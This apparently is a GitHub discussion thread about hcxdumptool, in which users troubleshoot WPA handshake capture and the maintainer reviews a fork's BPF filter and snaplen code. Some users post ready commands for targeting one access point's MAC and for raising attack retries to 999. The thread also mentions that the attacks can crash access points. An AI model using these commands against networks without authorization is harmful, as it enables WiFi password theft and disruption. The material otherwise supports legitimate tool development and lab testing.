@ZerBea I really appreciate your works on this awesome hcxdumptool. However even thought we knew that we have another alternative tools that works the same, hcxdumptool will always be my all time favourite because of the simplicity of the tools (only scripting no UI interface), the speed, the consistency and much more since the beginning. (plus an error due to own mistakes that teach what we are doing is wrong and take a lesson out of it). Hcxdumptool works fine on all of my network before, only this DilaAnu is hard I don't know why. I'm still trying to capture a handshake using the hcxdumptool with this AP, just waiting for my new antenna to arrived. Btw, I really appreciate your suggestions, your help, your info and everything you put in to this discussion to help me out. I hope this discussions can be a guideline for others also who facing the same problem as me or for those who wonder to know how to use bpf with hcxdumptool and much more! . This discussions is full of valuable information from the problems, analysis, troubleshoot, try and error. Thank you so much @ZerBea ! ❤️

[ZerBea]

Once you get it (use of 802.11 addr1, addr2, addr3 and BPF syntax) everything will work as expected.
As an alternative you can set hcxdumptool to the operating channel of the target and run it without BPF.
Once the hashes have been captured, you can convert the dump file and use hcxhashtool) or bash tools or a text editor) to filter the hc22000 file.
At the moment I'm improving hcxdumptool on a hardened NETWORK:
Laboratory AP is WPA2WPA3 in transition mode
Laboratory CLIENT 1 Smartphone running Lineage
Laboratory CLIENT 2 Linux NetworkManager (wpa-supplicant)
Every attack is successful!

[hyekalhitech]

Wow, sounds like extremely dangerous and powerful tools ! can't wait for this new version release!

[LLH-l]

This type attack can easily cause AP crashes, if the client again attempt
connect seems be rejected.
This need restart the router, the client can successfully connects
At least, in my router test,observed my phone attempt, it looks is like this
Causing my unable capture handshake ( If AP only have me is client )

[ZerBea]

Yes it can do.
But it is very helpful to see the how a BPF works.
Set AP to a free channel (where it is alone).
Set hcxdumptool to the same channel and run it with the BPF.
Observe the effect.
Change the BPF.
Observe the effect.
Change the BPF.
Observe the effect

[LLH-l]

@hyekalhitech

I run a test with hcxdumptool but still I failed. I did not changed anything such as my workstation, my clients, my AP distance and password. But still I was unable to capture the handshake by using the bpf filter. Im quite confused what is wrong with my hcxdumptool and still figure it out why.

hcxdumptool very powerful, the is unparalleled tools

Create BPF attack one MAC
sudo tcpdump -i wlan0 wlan addr3 aa:aa:aa:aa:aa:aa -ddd > attack.bpf

Start capture, in 1 channel target MAC aa:aa:aa:aa:aa:aa
sudo hcxdumptool -i wlan0 -c 1a -w a.pcapng --rds=1 --bpf=attack.bpf
Will In just a few seconds capture

If handshake cannot be captured,
ZerBea provided significant help
reference #407

[hyekalhitech]

Thanks ! Appreciate it so much

[ZerBea]

Please note (from README.md Requirements):

* Knowledge of radio technology.
* Knowledge of electromagnetic-wave engineering.
* Detailed knowledge of 802.11 protocol.
* Detailed knowledge of key derivation functions.
* Detailed knowledge of Linux.
* Detailed knowledge of filter procedures. (Berkeley Packet Filter, capture filter, display filter, etc.)

If you don't have this knowledge, neither hcxtools nor hcxdumptool will work for you as expected.

I will not add user friendly stuff at the expense of performance.
I will not add features at the expense of performance.
But:
For the benefit of performance I'll change/remove options.
For the benefit of performance I'll remove features.
And:
Form always follows function.

[ZerBea]

@theweefies
This is not a good idea:
https://github.com/theweefies/hcxdumptool/blob/d015b1d100537774dc4fddf68b1d49cfc4a8ba40/hcxdumptool.c#L446
because your filter it is a hard coded filter which main purpose is to test a WiFi USB adapter.
And it use tcpdump default snaplen (262144) instead of hcxdumtool's snaplen (1024):

$ sudo tcpdump -n -i wlp48s0f4u2u4 "wlan addr1 11:aa:bb:cc:dd:ee or wlan addr2 22:aa:bb:cc:dd:ee or (wlan addr3 33:aa:bb:cc:dd:ee) and (not type ctl subtype ack and not type ctl subtype rts and not type ctl subtype cts)" -ddd > mac.bpf
$ cat mac.bpf
39
48 0 0 3
100 0 0 8
7 0 0 0
48 0 0 2
76 0 0 0
7 0 0 0
64 0 0 6
21 0 2 3150765550
72 0 0 4
21 20 0 4522
80 0 0 0
84 0 0 12
21 0 6 4
80 0 0 0
84 0 0 240
21 22 0 192
80 0 0 0
84 0 0 240
21 19 0 208
64 0 0 12
21 0 2 3150765550
72 0 0 10
21 7 0 8874
80 0 0 0
84 0 0 12
21 12 0 4
64 0 0 18
21 0 10 3150765550
72 0 0 16
21 0 8 13226
80 0 0 0
84 0 0 252
21 5 0 212
80 0 0 0
84 0 0 252
21 2 0 180
21 1 0 196
6 0 0 262144
6 0 0 0

Your snaplen: 262144 (which is the default snaplen of tcpdump and a way too big for our purpose)

Now the same filter build by hcxdumptool:

$ hcxdumptool --bpfc="wlan addr1 11:aa:bb:cc:dd:ee or wlan addr2 22:aa:bb:cc:dd:ee or (wlan addr3 33:aa:bb:cc:dd:ee) and (not type ctl subtype ack and not type ctl subtype rts and not type ctl subtype cts)" > hcx.bpf
$ cat hcx.bpf
48 0 0 3
100 0 0 8
7 0 0 0
48 0 0 2
76 0 0 0
7 0 0 0
64 0 0 6
21 0 2 3150765550
72 0 0 4
21 20 0 4522
80 0 0 0
84 0 0 12
21 0 6 4
80 0 0 0
84 0 0 240
21 22 0 192
80 0 0 0
84 0 0 240
21 19 0 208
64 0 0 12
21 0 2 3150765550
72 0 0 10
21 7 0 8874
80 0 0 0
84 0 0 12
21 12 0 4
64 0 0 18
21 0 10 3150765550
72 0 0 16
21 0 8 13226
80 0 0 0
84 0 0 252
21 5 0 212
80 0 0 0
84 0 0 252
21 2 0 180
21 1 0 196
6 0 0 1024
6 0 0 0

hcxdumptool snaplen: 1024

That's why I don't use something like hard coded user friendly filters. Hcxpcapngtool will throw a warning that important frames has been filtered out.
And it is the reason why I don't start third party tools from hcxdumptool.

Due to performance reasons, hcxdumptool's snaplen has been reduced to 1024 (which is enough for our purpose):

hcxdumptool/changelog

Line 14 in 7c47599

changed SNAPLEN

This will not work, too:
https://github.com/theweefies/hcxdumptool/blob/d015b1d100537774dc4fddf68b1d49cfc4a8ba40/hcxdumptool.c#L5098
We are inside the options evaluation. The interface is neither known, nor up at this time.
Just change the order of the options (put -i at the end) and tcpdump throws a warning that the interface is not known/not up.

[theweefies]

@ZerBea, thanks for the feedback. I definitely appreciate you taking a look at that. I simply ported over some of the code i have been working on, but it is definitely not ready nor evaluated for use yet, which is why i haven't posted it anywhere or advertised it. You are absolutely right about the order of evaluations for the options and the potential for attempting to use an uncaptured interface name.

Additionally, you are absolutely right that the default snaplen of tcpdump us much larger than the 1024 limit of hcxdumptool's built in packet filter creation options, and it causes more overhead, potential packet loss in a constrained environment, etc.

I had to put coding on hold because my cat escaped and it is very cold here and i have spent the past 24 hours looking for her (she has been found now). I'm working on making some adjustments and will be testing to catch issues like the ones that you brought up. thank you again for your attention, and to anyone that is interested in this version, please do not clone until i am finished testing. thank you

[ZerBea]

No problem, you're welcome.

BTW:
Instead of an IANA PEN number:
https://www.ietf.org/staging/draft-tuexen-opsawg-pcapng-02.html
hcxdumptool/hcxpcapngtool use the MAGIC NUMBER to identify the source of the pcapng file when problems arise.

You should change the MAGIC NUMBER, too:

0x2a, 0xce, 0x46, 0xa1, 0x79, 0xa0, 0x72, 0x33, 0x83, 0x37, 0x27, 0xab, 0x59, 0x33, 0xb3, 0x62,
0x45, 0x37, 0x11, 0x47, 0xa7, 0xcf, 0x32, 0x7f, 0x8d, 0x69, 0x80, 0xc0, 0x89, 0x5e, 0x5e, 0x98

https://github.com/theweefies/hcxdumptool/blob/d015b1d100537774dc4fddf68b1d49cfc4a8ba40/include/pcapng.h#L116

[theweefies]

I will def change the magic number, for sure. thank you for pointing that out. I would not have thought to do that

[LLH-l]

Since version 6.3.2, the style GUI very good (compared old versions the style GUI)
Only need add a auto mode
Trigger auto mode command
$ Hcxdumptool -Auto
Start scan . . .

number     CHA  FREQ  BEACON  RESPONSE S    MAC-AP    ESSID  SCAN-FREQUENCY   5700
--------------------------------------------------------------------------
1	   1  2412 135353          + fffffffffffff0 ********* [0]
2	   44  2412 135353          + fffffffffffff1  [0]
3	   1  2412 135353          + fffffffffffff2 ********* [0]
4	   1  2412 135353          + fffffffffffff3 ********* [0]
5	   40  2412 135353          + fffffffffffff4 ********* [0]
6	  11  2462 135351          + fffffffffffff5 ********* [0]
7	  11  2462 135351          + fffffffffffff6  [0]
8	   6  2437 135351          + fffffffffffff7 ********* [0]
9	   36  2412 135349          + fffffffffffff8 ********* [0]
10	   1  2412 135349          + fffffffffffff9 ********* [0]
11	   1  2412 135349          + fffffffffffffa ********* [0]
12	   149  2412 135347          + fffffffffffffb ********* [0]
13	  11  2462 135345          + fffffffffffffc ********* [0]
14	  165  2462 135345          + fffffffffffffd ****** [0]
15	  64  2462 135345          + fffffffffffffe ********* [0]
^C

When Ctrl+c stop, pop up target attack sequence number
Select targets: 1,3,5,9-15
by shell auto create BPF and capture commands,OK !
Start capture . . .

CHA   LAST   R 1 3 P S    MAC-AP    ESSID (last EAPOL on top)    SCAN-FREQUENCY   5700
-----------------------------------------------------------------------------------------
  165 135534 + + +   + fffffffffffffd




   LAST   E 2 MAC-AP-ROGUE   MAC-CLIENT   ESSID (last M2ROGUE on top)
-----------------------------------------------------------------------------------------
 135534   + fffffffffffffd aaaaaaaaaaaa ****** [0]
success capture
^C

[ZerBea]

Glad to hear this.
But the price for this real time display is very high:
#388 (comment)
A packet loss is very likely.

[hyekalhitech]

This is not my level yet for discussions, it seems interesting and sounds complicated at the same time, I leave it to the master @ZerBea and @theweefies to discuss about this and waiting for any excitement 😄

[theweefies]

ZerBea and i are not in the same league. His knowledge and mastery of c and the 802.11 protocol (and its manipulation) are pretty incredible. I am something of an improver (and selfishly at times). It's easy to get lost in your own desires and forget that these tools are for use with a wider audience, and are vastly more complex than they might look on the surface. It's very easy to think, "let's add this feature or that," but as has been repeatedly said here, features have cost, no matter how simple. And the fact is, the maintainer/owner has the final say in prioritizing costs versus functionality. Additionally, while a feature may be easy to code in, it can have cascading effects that may significantly alter the way it was once intended to operate.

Sometimes, I just like to go down rabbit holes. And then realize a week into the rabbit hole, what I wanted to do or have spent a significant amount of time doing, is not feasible. And sometimes, good tools just don't need to be changed if they work. Sometimes, things just don't need improving.

[LLH-l]

I run a test with hcxdumptool but still I failed. I did not changed anything such as my workstation, my clients, my AP distance and password. But still I was unable to capture the handshake by using the bpf filter. Im quite confused what is wrong with my hcxdumptool and still figure it out why.

@hyekalhitech
#411 (reply in thread)
Can increase retries attack, ( hcxdump default value small， Only 4 and 10 ）, hcxdumptool will soon stop working
Need increase the number of repeated attacks
sudo hcxdumptool -i wlan0 -w cap.pcapng -F --rds=1 --attemptapmax=999 --attemptclientmax=999

[hyekalhitech]

@LLH-l , thank you so much ! will have a try on this method ! Appreciate it !

[ZerBea]

@hyekalhitech Please also try this and report exit message (Packets received, Packets dropped and elapsed time:
#414 (comment)

[hyekalhitech]

@ZerBea thanks! will do, appreciate all of your helps!